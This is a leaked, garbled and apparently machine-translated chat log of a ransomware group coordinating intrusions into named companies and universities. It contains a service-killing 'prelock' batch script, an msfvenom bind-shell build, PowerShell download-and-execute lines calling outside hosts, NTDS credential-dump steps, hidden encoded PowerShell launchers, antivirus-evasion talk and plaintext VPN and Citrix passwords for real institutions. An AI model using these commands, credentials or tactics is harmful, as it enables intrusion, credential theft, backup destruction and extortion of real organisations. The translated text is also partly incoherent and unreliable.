not looked, it does not develop. The point of it? Another analogue on the empire? Of course I tried different ones. At different ports.Pointed to the inner ipe? Ratnik does not work, no bounce check those 2 softy about which above wrote? Yes, I know, they just do not yet (sessions would ususer1 does not work with us.I have you offlineWhat do you mean where? Where is @user1 @user3? 
https://www.youtube.com/watch?v=OvESADFx2eE Diagram of a remote MITM attack on the WSUS system tv with what to work with 7:space_invader:hihi which all hello to user1 while all are busy, reserve for us) there is a fresh to work grid, if anyone without a job - beep in pm please where you pass + + others who are without tasks now - write, do not keep silent i got it right - two interfaces on the touchceno also from chetu by the looks of on chetu just there, i move sideways and then the session came but the ip is different now run if you do not have session thrown me chetu? hello there. everything. sait i got it back khanypot it's definitely averm i think it's aB`threattest.edgewave.com i don't have a live one yet, who has sessions left elsewhere? on regbest.com should be coming soon session from chetu.com - tell me how it will arrive .binverno 10 minutes it will now be ready to palyoad - i will make all hello, we need dllk segonday for the bounce, right? so, let me give you access to 2 prodomains at once one. @user7 there are 2 more people on the road which second?) and where is the other half?) hello HiHiHiHiHiHiHiHiHiHi, you never keep more than 10-15 active sessions ok when you need to do related work in 4.1 client do not remove damy to 4.2 go for final? + ok, then all have 4.2 cleaneno 4.2 i also have ona 4.1 in my koba yesterday closed the gofer?:heavy_plus_sign:+ everybody have coba 4.2?:heavy_plus_sign:+++tasks are clear to all? hi Good evening:space_invader:add me to the comrades in confabs let's write from one dude to another about pass from nimbla flows against the current what? in water the scheme is unusual we close two networks at once? there's a couple of people in the water, some neurotics who go to these nimbles, but they don't save their passwords anywhere, and they're reloading their mail.
once again on the computers/servers went through\to the browsers files with passwords and what were you doing? how are you getting on? google help)[ ](https://mediaeveryone.com/channel/general?msg=QPvucTEsDKGjawem2) is this something that already exists, or do you have to do? which can overwrite a network drive a few times console fileshredder[ ](https://mediaeveryone.com/channel/general?msg=xNu8E3Moc2RP4oAJv) and more? to overwrite backups if it does not encrypt[ ](https://mediaeveryone.com/channel/general?msg=YW4zCCrXYpf7Q7Hvu) go to ssh and rm -rf-prepare more filehreddertoday I'll try over the garbage if lin will allow. it's pretty neutered there or check their disks all?we've been mashing them and mashing them and mashing them and mashing them and mashing them. we still haven't updated to 10[ ](https://mediaeveryone.com/channel/general?msg=Y9hzbFuc43vehpwWG) to all esx? We have to look at the confab first, clarify what lin systems are there? there is a skul, there is mail (one), there are listings and files, there is access to esx all or not all at #rtpcompany-com more precisely say without like in #rtpcompany-com *almost* everything is ready in #waterway-com the skool is rolled out, there's a problem with the mail, there's a problem with backupsBackups on the mega have not goneBackups are trying to take off no 445 anywhere, only backups are visible on the nasa for nowHow is the work progressing?hi all hello thereafter, we are trying to remove the backups from the mega in the water, let it pour in the mega in the water, and do not confuse which one or what and the mega we leave it in the water in the slipIt appears that piripezd sometimes in the mouth cleaner even missthink only water then okada it missklik in the water now .you misinform me in rt all yes only water and rt and water while loading? no in rt all unloaded? would not want to leave the mega there it's all very interesting, but can we wrap it up already today? I'm sleepy. 
Everything's ready for the rtp. i've got everything on the water except for the backups, tomorrow i'll have time to deal with it by 3Too subtle bdsm whisper it's the windup's business to sufferSo let it stay like that)Good for you too generous rating "Fragile "It's not fragile, it's just fucked up. It's better for everything but dota and pbna. Fuck the windup. ``` of course fuck it, you can see how fragile it is) maybe. i don't even know why it's allowed for rdp maybe it's because it's a "remote" service if you could do that there'd be a lot of conflicts Fuck the windup... but it's the windup... i know it's stupid... it's vindaKuryu i understand that you're googling now, well when you finish googling please tell me what you found in the repository of knowledge it's a fixed protocol, not a service that you can deploy anywhere else all the rest is forward on nix - you could on vinda) seriously?) you will ALWAYS have reception on the smb on 2 ports read the documentation) ``` Googling))) not changing the port is portfwd It is possible to configure port mapping on the nasa Everything can be changed ``` read the documentation)) it's a medal the last two messages - on bash.org unequivocally and no matter what it will not work everything can be changed I'm not even fucking sure that it changes in the wind in general) ok not change the port in AD and then guess which one is smb which is the rdp how will it work without smb? for example diskshare...psezek? but what's that to us dastmik also does not work[ ](https://mediaeveryone.com/channel/general?msg=3xDH4WufyJHjSg3X6) now the cards will point the way no idea, it's too complicated this time which rdb which of them smb to guess potomotnite 1 to 65535)mb port have changed[ ](https://mediaeveryone.com/channel/general?msg=Jy7qoefNuXnWSgxhx) thoughts on the subject? these remained+tok with the backups listings left in the water can not remove because there is no rdp or smb ports loaded on the megutak well what do you have? 
in half an hour, guys who have something important left in the tpsh take it away ponyaly he will skip at the next attempt to network location as soon as the file location process starts on it hangs the flag immediately no it does not conflict with each other? if from two servers, conditionally, will come to 1 arm where 1 has already started the process but if it's everywhere off then why not? it will work if you turn off the Aver by itself it's possible to do so for example from a SYSVOL balloon which is available by default to all machines domainedr can it kill? and maybe add to the batter, that at the end it would download the locker from some balloon and run? it does not conflict with each other? if two servers, so to speak, will come to 1 arm where 1 has already started the process run it without arguments and the locker will start scanning the network for available balls as it finishes locking "in itself" on the machine as you can see it slows down services and kills peeps who can hold handls + shares disks "C:\Windows\system32\net1 stop \"samss\" /y" "C:\Windows\system32\net1 stop \""veeamcatalogsvc\"" /y" "C:\Windows\system32\net1 stop \""veeamcloudsvc\"" /y" "C:\Windows\system32\net1 stop \""veeamdeploysvc\"" /y" "C:\Windows\System32\net.exe\" stop \""samss\""/y" "C:\Windows\System32\net.exe\" stop \""veeamcatalogsvc\"" /y" "C:\Windows\System32\net.exe\" stop \""veeamcloudsvc\"" /y" "C:\Windows\System32\net.exe\" stop \""veeamdeploysvc\"" /y" "C:\Windows\System32\taskkill.exe\" /IM sqlbrowser.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM sqlceip.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM sqlservr.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM sqlwriter.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.agent.configurationservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.brokerservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.catalogdataservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM 
veeam.backup.cloudservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.manager.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.mountservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.service.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.uiserver.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.wmiserver.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeamdeploymentsvc.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeamfilesysvsssvc.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.guest.interaction.proxy.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeamnfssvc.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeamtransportsvc.exe /F" "C:\Windows\system32\taskmgr.exe\"" /4" "C:\Windows\system32\wbem\wmiprvse.exe -Embedding" "C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding" "icacls \""C:\*\" /grant Everyone:F /T /C /Q" "icacls \""D:\*\"" /grant Everyone:F /T /C /Q" ``This is an example of "prelok" batnick let's hope they won't eat it)) he has some kind of toolkit there or is it shellconcat too? in this network semantics is vicious while his loads work yeah, does the new coba come? 172.241.27.18 https://agesk.com ---------------------------------------------------------------------------------------- 209.222.97.8:62460 TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o #wilsonart-com:space_invader:space_invader:space_invader:space_invader:space_invader:space_invader:space_invader,#wilsonart-com:space_invader:space_invader:space_invader,#wilsonart-com:space_invader:space_invader:space_invader:space_invader:space #wilsonart-com:space_invader:space_invader:space #wilsonart-com:space_invader #ballymoregroup-com and something else I'm not involved in what's in the works today? 
I'll keep you posted on how things go from here, most servers are off, those that aren't are encrypted...have you checked the old network? hi)everybody, the old network is checked, but the rest is not[ ](https://mediaeveryone.com/channel/general?msg=egNgG9m4nGZggDsk2) no[ ](https://mediaeveryone.com/channel/general?msg=5hJjTn62neuBcoHf4) intrigued... And an hour has passed alreadyNo fly sessions did not help in an hour, all together we will get together on a small bering about the next week but in general they may not need soonernae anything)on zakrepov .... a zakrepov? + updated the files in tours, there detekt 4/23 on the dynamics instead of 9/23started these two ways `` regsvr32 file.dll rundll32 file.dll, StartW ``Disassemble I have all x64? ok, 4 then, it's better to have in reserve in tv as well but just in case it's your only chance to clean the load 2 shellcoats that's it? i'll give you a couple more vpn's in work 2 pcs? all? send me a shellcoat i'll give it as an archive but i can clean it by hand at the moment by tulsam, dudes come by, but computers are not domain so it is hard to get there. i threw hashes tl2, maybe when it will unload...on sccy silence? i with the tv and user7 helps the sccy is silent? 1 with tv and 1 with sccb? the same as yesterday) who's working with what today? Extracting DPAPI Backup Keys with Domain Admin https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ ``hi:space_invader::man_raising_hand:hello everybody it does not work citrix? no session as I understand no? parsing is working with the network via kmd, trying to raise rights without backconnect parsing is what? 1) dns tunneling 2) parsing WITHOUT EXTERNAL CONNECTION This is where the fun part starts. we have two options really do not (no))) now look whether there is no external at all? 
tried powershell command generated input - seems to run but no session they are swearing at something, and what I did not have time to understand http://gist.github.com/ethack/110f7f46272447828352768e6cd1c4cb through downloadstring and iche easier to do so, or rather not from a file but from a buffer possible to make an intermediate input script which from a file will emulate keystrokes, did it when they had to without a buffer large lines to type manually = )))) there clipboard does not work - any idea how? one of "chips" Citrix if the kmd is already running - it won't close even if the citrix session dieshttp://cobaltstrike.com/help-externalc2 then the session will stay alive and if the kmd opens the host is back:confused:Hello!:metal:hello everybody)I think something like `powershellexe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe") NOT via rdp ``` I wrote above startup of usual applications is logged simply, those which have already been marked as "current" plus if a user comes in at the time of the work and sees the new ones on his dashboard... 
Well, in general there is no need)) and use those that are available, they "can" go up in the allowed applications should not make changes Passage to the webserver from the frontend, if it will be much later, it is a very vast topic and requires a fairly deep understanding of web technologies, well, at least when we are not talking about vulnerabilities wordpress blogs = )This "basic" checklist for citrix escapehttps://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/цитрикс is a thin client, but still it is a webvpn that is almost always tied up https://sf.primeinc.com/vpn/index.html ziegd SuperbowlChamps20 ``` call kmd = ) NOT through rdpna collective intelligence))so, a practical problempohyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy, now we'll do it...we don't haveGood morning. There are live sessions for further practice? hiGood morning! Monday at what time? here. see different ips) 209.222.97.50:10201 here is mine and I do not have another.206....24[ ](https://mediaeveryone.com/channel/general?msg=9G9GPaySX5fNYHYD4) about itThat about which dedic? you about which ips) I have this dedic long ago, you gave it and asked after setting you to write that you took a picture and can roll it back. Look even there is a softs kotryy you have not put) I have not configured access to your addy, I gave you ` own` I gave him to work with evo with a already configured vpnomvzaimno no, you what confuse that squeeze me) is myparu min@user3 you took? 
not me, mine `209.222.97.50:10101` who took my addy after # evo-com?and i don't get it give you a fresh build tulchyna then 20 mnahahaha second you don't have to go shashitvo first these copypastes devil's toy go all the buttons i need to write one option)can combine )@all i'm preparing you a guide to speed up work, you want to poke buttons in the tulch or copy from the guide?okily let someone tell you a few posts above on updating settings for someone who came to life)we still have 10 hours too early)ready to go to sleep now + we will have a general discussion on process optimization next week will be very busy, so I recommend you get some sleep this weekend if you need more than one different is a separate special order1domain one, or will there be different?++understood? now everywhere use domain in https hosts (stager) ip domain you used to specify the domain in httpshosts in the settings koba little change all in the attention I have an announcement call everyone in the chatty cute sweetdalay i still in koba @user9 sit time why drag it out to replace there is nothing in google that sessions do not fly so if nothing in google, then what do you say?why are you silent? I think nothing in google, but it does not fly there@user8 what's wrong with the cob? and herehttp://github.com/asciimoo/exrexhttps://www.passcape.com/password_recovery_mask hashcat can do that? https://github.com/hashcat/maskprocessor google no need to remind a shithead. If you mean ping, then it's okay. if not - remind me) so check the method known@tl1 try to pass any session in agesk.com i got nothing from last login, not from coba @user9 check how dirty is 1? i'm also in CRISPREGIONAL.ORG@user9? someone is missing than from putty to get the crits for #1-done-crispregional-org in passing at #0-dead-waterway-com checked to see if they're up or not. The situation since yesterday hasn't changeddrawing adinfo from trusts in #corp-televisa-com-mx so who's doing what? 
Fuck, everyone had it, but it fell off at different intervals[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) were only in one cob?[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) I don't see it fixing[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, but while I was helping the other one, it fell off. you fixed it yourself and that's it[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, user4 with it 2 no answer urgently plz, is it up and running? hello, some of the servers were restored in yesterday's see what's up? hello everyone https://ftuapps.dev/proxifier-standard-edition-3-42-x64-x86-keygen-portable/ ``from the machines where you can not go dump the craps through the cme how are you doing? good morning, thank you all goodnight)https://hackware.ru/?p=11287LM:NTLMт e in this format takes hash yes?good morninGood morninGood morninGood +++ accepted If i will not be there by this time and you have a deadlock you can go home by 1 o'clock then i think how to do it there is an option to do something else with relayeny da, there are about 6 dk and all patched eezerologon also past? try all kinds of web services scanners search da, already tried a hundred times on other pc's tried?there is a ghost of hope for sbmgost and ethernal? there is a ghost of hope for shulcitra alsoexcch can't be seen noasharfineedr gave nothing? nothing at all? well, there is another thing for 20k pc 0 services? more specifically nothing can be seen citra, vcenter, shul etc. there is almost 0 (refer to services within the network) well in general we have a deadlock now in our network, maybe some other vectors you can suggest?tomorrow by 5 what a delight))) to 2 work with what we have today without sessions) to 10?)))) by how many sessions will be available? 
only 2 will be available, the other creeds are not valid (so do not turn off I ran across some that were available, they need to connect to turn off the winDFto yesterday have not finished? dig into snpartners.com. what's the task? 108.62.118.209 https://simvp.com - 104.194.11.10:50058 ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX Yes and yes@user9 you t eotclick in sessions no? is this a new one? Tomorrow everyone will show extra sessions on this today so that[ ](https://mediaeveryone.com/channel/general?msg=cp3jcby6d8QQMTgur) Group is not, so I'm writing here I ran out of brute force, of course nothing was brute force scanned more on skul, ftp, webs tomorrow the plan is to let ms17-010, but no credits, so I think the result will be the same as with smbot write to the group at what is over remember to send kerbs @tl2I took kerbsdosorted servers 63sh thought will ever come in a thousand restart, but no, the system failed and now sometimes loads less:zany_face:I do not know their domain, while I am not online? meaning from the dedicam under wpn `unf.edu `? there is a hash of LA and a bunch of computers where it fits, but it's all Windows 10 Educational I tried that hash on the servers and it didn't fit. All my sessions are dead and the domain is in the black. trying to enter the coboo, which broke yesterday from the tulchain's addfynd, hangs on about 90%, but every restart loads ~20 bytes more :thumbsup:[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) on my got the VPN up - scanned the ip scanner from my ip/16 scanned the ports of the PCs I found, there are some with 445 let smb_login with the codes that are and . in the domain, in case there will be so what do you have at the end of the day? from 1:00am to 10:00pm to what time? 
please let me know how you are doing on the tasks give me an ip in a private message I can reload the dedic?put vnts and connect so)[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) here is the link to the vpn, but after starting the vpn, the dedicle, apparently, goes beyond the vpn (when connected to the vpn just hangs RDP, after reconnecting RDP - vpn off. After turning on the same goes for a VPN and hangs) will save a lot of time for those who do not have anything except LA Credits on a bunch of machines https://github.com/Hackndo/lsassy use this one take the time to set it up correctly once. so you have a set VPS on hand for this fuckin' thing right now https://vpn.floridapoly.edu austinwise0712 MechEng030796! ``` @user9 substituecan't you do anything fun in the settings? Is there any way to tunnel if there's no .cr download option? I tried the citrix.tmwcloud.com link and creeds, but the connection just hangs in the download. In citrix itself, all icons are disabled, everything is not available. https://citrix.tmwcloud.com/gti/auth/login.aspx mritchie Welcome01 ``` @user9 replacementwhat can you do with it?)[ ](https://mediaeveryone.com/channel/general?msg=oL6a59ZRrXQpcJ8sv) and here it's not clear, it's some kind of crm didn't find a console or something to send commands or a file to cram Terminal Door Control - toggle switches open/close doors, vending and so on, write the status to the group https://www.emorycard.emory.edu/onecardwebadmin/operator/logon cwatson yourdoom23 ``` @user9 no substitute, empty nothing at all in the citra? @tl1 can i have a substitute? ipn does not come up and nothing can be taken out of the citra because there is nothing there.already createdhumboldt.edu external domain what? can i have a confu `AD.HUMBOLDT.EDU` output to confu then why is the output different? 
they are localgroup that not /domainlocalgroup /dom?[ ](https://mediaeveryone.com/channel/general?msg=qGXwKiGcGYSmbDoxQ) maximum strange design if you connect not through a browser it will hang[ ](https://mediaeveryone.com/channel/general?msg=Cm4AQuumDNbMoDprq) and it should ask the user to start the upa which I downloaded earlier@tl1 @tl2 What if I use net localgroup "administrators" /dom I get domain users with admin rules on the machine where I start it?[ ](https://mediaeveryone.com/channel/general?msg=cAmidLT3JooCsCNQE) a blank account, nothing in the zip it's not always clean, but you have to know it or you can uncheck your settings and it will show you the path to the history Get-PSReadLineOption `````` History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt . ``How do you clean it up?`` Who else don't know if you can store command history on the system? https://vlab.humboldt.edu/rdweb/webclient/ vl77 M1lksh@ke ``` @user7 replacementa what do you have? https://apps.ufl.edu/citrix/xenappext/auth/login.aspx icebecky PeGjzXpnvx3Mjp$ ``` @user9 replacementwrite status please work in your confurdn will be ready by night, so you will issue it tomorrow. today we are working under current conditionsThis is good newszbs + so that in case of what you can roll it back I will make you a snapshot of the state immediately as you pick up your personal, change the password from the account and send me in a personal message new password then configure your environment but the basic state soon - during the daymne 16)))there are 3 wine 10 and 3 wine 2016 ok! Glory to the great wars! 
you will soon be issued individual vindustadny granddisks by tasks in the confab immediately) I am close to a standstill I had a story yesterday on /16 on 445 from his sabinet, but nothing found) but it's like Everyone has a task?okkakak you remove the hashes at once jump to a couple of servers in addition)naturally)and whether the account is active at all and so check the validity firstOk, kerb I saw - will dtsink doCHalf an hour will come and if there are problems will lookmne need to leave for half an hour now will be, so just say, keep working on yesterday's tasks, you also have 4 dedics now, cobs and everything else the same@user4 you there kerber frustrated) @tl2 to the conf conf conf skniulHi, not there yetAnybody here? All hello:space_invader:tomorrow by 2 today until 10```. System Boot Time: 12/28/2020, 12:01:39 PM ``He doesn't turn off the car? ====== AntiVirus ====== Engine : Spybot - Search and Destroy ProductEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe ReportingEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe Engine : Security Manager AV Defender Antimalware ProductEXE : C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe ReportingEXE : C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe Engine : Windows Defender ProductEXE : windowsdefender:// ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe ``12:03 PMav what?[ ](https://mediaeveryone.com/channel/general?msg=poHHucH2R6fwbP7Ss) seems like it should'' CurrentUser : WATERWAY\mharper Idletime : 01h:11m:03s:765ms (4263765 milliseconds) ``So isn't the session in keystrokes supposed to be empty? Isn't it supposed to print? On the contrary, the hartbit is 0 and the session is still dead, so I don't write keyloggercontext user in svchost[ ](https://mediaeveryone.com/channel/general?msg=mXPPGXmFrDTjn3jAw) and the keylogger isn't set to it, right? 
``` https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2 ``` he also had this in his sharpshooter output ``` http://192.168.0.43/,http://192.168.0.43/,10/21/2019 11:08:36 AM,13216147716516941,, ``` it's nimble, i.e. walks, but no credits( on the same computer found a password-protected file Passwords.xlsx, on the off chance I poked the administrator password, came up, nothing interesting now trying to open two aacdb-shek@tl1 Checked all available servers/arms everywhere KB stands, now go to the armies check the files, mb that will be. interesting @user3otnick that you have on the results go to the guys (+ at all? no problem, tell the others that you can so time to waste) thank you okay? ``So I'll let go then?`` The first three have passed.`` ``I'll send you a list of all the users and hashes there is an option to check the list of hashes)))) how to 1? I check the hashes of dudes from the group "vpn users" and what are you doing? no more give you everything+++ right? 
we have @user3 with #evo-com @user8 with #1-done-korbel-com @user4 @user7 with #waterway-comwhich one of them should have admin rights therefind the mail server - try the acctsDa clarification of some circumstances, just lack of data on the network itselfa what are these changes related to?as you go along, I think you'll figure it out, I think it's `/ecp` what is it exchange admin sektepoka there is an admin account on this EAC which provides mailboxes unloading find a server and look at it as a backups it is additional url on the server and like it `/ecp` what is it exchange admin sektepoka only 1 option of developmentkak what algorithm of actions after finding the servak itself?yes i think how to formulate the question on this point@user7 and @user8 tell me how to do the 3 point) yes, you) and yet) there is a question on these points i will not answer any more@all look here and write that you saw the message) we backups? 3 the point is clear? how do you download them later within the limits of gbling is clear, but backups are heavy. do we download? so there are no questions later @all all saw? it's about what?+ additional tasks nimbul like nimbul did not come, there's nothing moved? in the confines? ok, I would have that archive - came you under @user9 logged in? you seem to be in the confineshelp with waterwayappendix is closed / shut down. I reinstalled it, so far it works, what's wrong with it? 
I'll give you the hashes above, you can check yes, YES long time ago should have changed, right? and stop ... YES these on kmd5 passed ``I think there's about domain authorization there.``Are you trying to admin? They changed their passwords a long time agohave a look for vpn / remote / offsite / partner groups similarwhen our process is complemented by the following actions: 1) remove backups listings up to 7 levels of nesting 2) whine file listings or table structures 3) Backup of mail server 4) fetch 3-4 file backups from the network, and immediately adinfodsink is in the archive above? and try to access these links, you need to pull from the ntds hashes of all users from the group associated with vpn://vpn.korbel.com/global-protect/login.espURL : https://vpn1.korbel.com/+webvpn+/index.htmlhttps://vpn2.korbel.com/global-protect/login.esp need 1 volunteer to korbel) even lessa in the confab? not much at all (here are such messages from the network, information about external accesses anything interesting there, in principle... and you need something specific? already looking at the question is important check it comptipo what, come to life? user9 should be nothing? 
backups listings, network architecture files - who left interesting files from #1-done-korbel-com? so once again, to all the questions: when some changes in the work, he has something with the rock. I @user4 not in the network today. @user9 absent, so everything is in place, get it all. vpn password what is it? zgLLMB1KXkzV6Dtn4GWQ8S49 + accesses. someone already have `104.171.123.166:45330` it's not new, but not too dirty. + disassemble and report who got what. 2 clean. in the work we have #waterway-com #evo-com. I will give out two new clean, the old koba is preparing to close and let's more distribute, so then wait for everyone. I'm hooked there for closing already, did not catch this moment. kat some database files, structures, backups and other things, it is not interesting) ping on it, remained build and hosts. Hi! Few @user3 here, but you corbel no "interesting" files? + the rest are delayed? so yourself, how? Yes, with a knocked-down sleep mode is not very restful. Hi, all with the coming) as a rest? :space_invader: What VPN would you advise? So easy) you are also here) and what are you still here?) @tl1 We will spin them) you have 3 more sessions in the work) I hope there will be more) Thank you all! It was fun)))) Thank you! See you on Monday, have a good one. Thank you all. I had a stressful and difficult week, but it made me happy) Good night!
That's all. Keep the manager open and see the "anomaly". think ahead, if there will be the service ac processes without a direct need on the machines where it should not be (we have a web service ac, judging by the login, and we work for DK) just jump into existing processes before that, better in winlogon jump. how it is done: 1) check the status of the service which is responsible for this: `sc query vss`. 2) if off, then `sc start vss`, if on, then leave it 3) dump: `ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q` 4) check service status `sc query vss`, and reset to original state
msfvenom -p windows/x64/meterpreter_bind_tcp rhost=10.10.30.17 lport=4444 --format raw -a x64 --platform windows --out bindshell.bin
4:55 upload /home/user/Desktop/shellConcat/bindshell64.dll
shell rundll32 C:\users\lgentry\bindshell64.dll
4:55 ./shellConcatenation.1.0.0 --source=shellStarter_x64.dll --target=bindshell64.dll --addBin=bindshell.bin
stanislavtimofeish 5:01 PM shell rundll32 C:\users\lentry\bindshell64.dll
msf6 exploit(multi/handler) >
Now the task, take down the NTDS dump on dc. find_tag please report the results to your groups, what stage of progress now, have you decided, have you tried ps1 script via execute-assembly? https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1 For us you can't. who will take over one more session? @user1 ? i wonder if they are so co-spawned, did not you put them? in the comments? maybe you still have one back there. @user1 , @user3 there is another session, in the domain. who to give in work? who has the least load now? reciprocal thanks! reciprocal. everyone have a good appetite ://dpaste.org/BIJK Greetings. Good morning. Greetings in the confines of progress. + new session in the input coba, by request waiting for the session. Access to the admin + looking for the admin in the AV? What is in work now?
Good day. Good morning to hut. Good day. Greetings to all. in the itc-us.com will be finished today. you already copied messages?) you only build order))) but good night, until tomorrow, until tomorrow we will close sysdak. even to 6 most likely will be delayed until 2-3 am tomorrow, by 5 in general such things. okay, if no interference AV. describe what you did on the result is lazy) you stopped at kerb. nothing of this have not tried, I will try to see, and what passes to try? i have a list of only 4-skul, zero, smbghost? i have tried on all cars to raise the rights, nowhere succeeded, under this type of creeds do not knock anywhere else, and the other polzak only in hashes rubus, still waiting for them. on all labs i.e. you have where to go? everything in the confa, yes, AD and other things are? if the kerb is unbroken, then you can further unwind. there are places to work? on all machines (virtual labs) under it authorized (some sessions have hung, if necessary, I can restore them) there do not rise all elewaites in the cob. tried it. there is where to dig? #humboldt-edu is the one where the user can only go to the virtual labs, AV there windef remains. in your work then through tpsh you can remove hell and kerbs and other. it and killed it after loading? I went to rdp, ran cmd, in it ran your one-time command, went to tpsh, figured out the interface, wanted in cobalt dll, ran the attached string and got no response. I didn't get it off. Didn't get a response from AV. Didn't have time to try anything at all. The session in tpsh just died
```
(New-Object System.Net.WebClient).DownloadFile('http://199.127.61.166:8080/A3z4km1/x64.dll', 'C:\Users\Healdton.IT\x64.dll')
```
Minute. @user7 av which? stop, this other one can't pull anywhere, AV breaks everything, user not LA. but with a different way of loading?
https://vlab.humboldt.edu/rdweb/webclient/ @user7 here we have what? flew, after a short time - flew away. tpsh comes and goes? by stg? yes, marked the second one you gave - the creeds did not fit in tpsh. this was `https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx` is this one in your work? are the accesses working? so i need to re-save it. @user8 then you still have work to do with it. that's all i did. outside the domain, i didn't pull out the dll i wanted in cobalt, ran the download in tpsh and no response. did you pull out the core? not working on it yet, i can't see what else can be done with it. work with ttps://lab.devry.edu/vpn/index.html have you got it working? only 1 subnet is visible, there polozaki. @user8 there are 2 questions to you: by the story, vectors were not identified? have you tried different software dll load? i worked with the first one less than 10 minutes. on the dedik under vpn no cracks. Checked the network at ms17\bluekeep\smbghost and nothing. was the last option to find a dc and outside the domain to put a zerologon, but dc I have not found. what? do not know. `https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx` @user8 what do we have here? https://vpn.floridapoly.edu also a question for you, what's up with you? okay, you wrote off her status, she's in the works. I'm up to my neck in it. It's only possible to work with her through msf. even if i somehow miraculously get up to yes, then i do not know what to do at the stage of crypto) you have a working network? @user9 nothing but windef? another thing `https://ra.vdi.stevens.edu/vpn/index.html` no way to upload the load (coba/msf). Neither as an exe nor as a dll. I've uploaded via powershell and chrome.
Everything chops windef (notifications pop up). without a step aside. write status on this grid. no jump the topic) not a word about it, so we are not about sisd. bitdef in sisd. peta bitdef where? here only windef but angry as hell - kills everything at download stage, or launch in case of psh. it chops the cob, msf, psh dlls? @user4 you have a bitdef from the point of entry? one by one, you've confused me) and in the last one only windef, well I have BitDefender. well apparently. give @user4 mcafee and you? everywhere mcafee. what av? through msf dll can try to put there. oh yes, here does not work tpsh, I do not think that there and work. if you throw through psexec command load in tpsh? tried windows/smb/psexec with these creds, the session dies. So if there is a pass to the other PCs why did not go there? no, the list and a third of the list did not pass) tried windows/smb/psexec with these creds, the session dies, and the admins (LA\DA\EA) i.e. hash yes? has hash LA, fits to several computers. what's there to brute-force? nothing but mcafee? it's like they have some kind of iron that filters traffic... mcafee. similarly what av? dies right away. psh? have a system, session in msf, i can't get a session in both coba and armia (different ports, payloads). in armia dies right away and will not reach coba. hash LA, fits to several computers, but the session dies when brute force (goes through a list of 40 pieces), proxy msf some unstable (rotate more precisely) took off. yes, and admins (LA\DA\EA). dll coba, dll msf. chopped at the stage of downloading all - what? all chopped by windef. http://ra.vdi.stevens.edu/vpn/index.html @user4 what's up?
ready. @user9 https://lab.devry.edu/vpn/index.html what do we have here? and in order: clean the sessions and in slip we finish, then half an hour a little meeting and summarize the results of the week, another half hour. To what time today? to the coba not at all, in the arma immediately fall off, different load ports and so on... i'm busy with mine, i'm trying to get somewhere from msf. i tried both coba and arma to throw a session - does not come in any way. No software, i left on the forum so far only guides for gui. looking for how to bitdefender chop up. a lot of you without a job? Who are you asking? Are you still sitting idle? Well, the first domain (`tcph.stg-healthcare.com`) in tpsh fell off, the second (`signature-healthcare.org`) - citrix creed is not true. so how are you doing there? if no one's writing anything like that, I won't even write about it here + your colleagues might have written it down - I won't repeat it to you - I already wrote it down, I'll go ask him. google second domain @user8 https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx ? where's the psh history file? ok. replacement, or can i help someone? ok. for now postponement) it's a one time thing. i want a nickname, too?
powershell.exe -nop -w hidden -ep bypass -e Why is it the one you threw me off the punks hoyrebytes give a one-time load the same command? try tpsh. mmhom the alerts popped up that the dll worked successfully. what is the sonar? and cmd access fucking. danila i can't get it in the kobe either so i don't use the load so it's always dirty `powershell -nop -w hidden -encodedcommand` dacobs? beacon in verashell format? well the one my colleagues tell me about :confused: i'm scared to ask what psh?
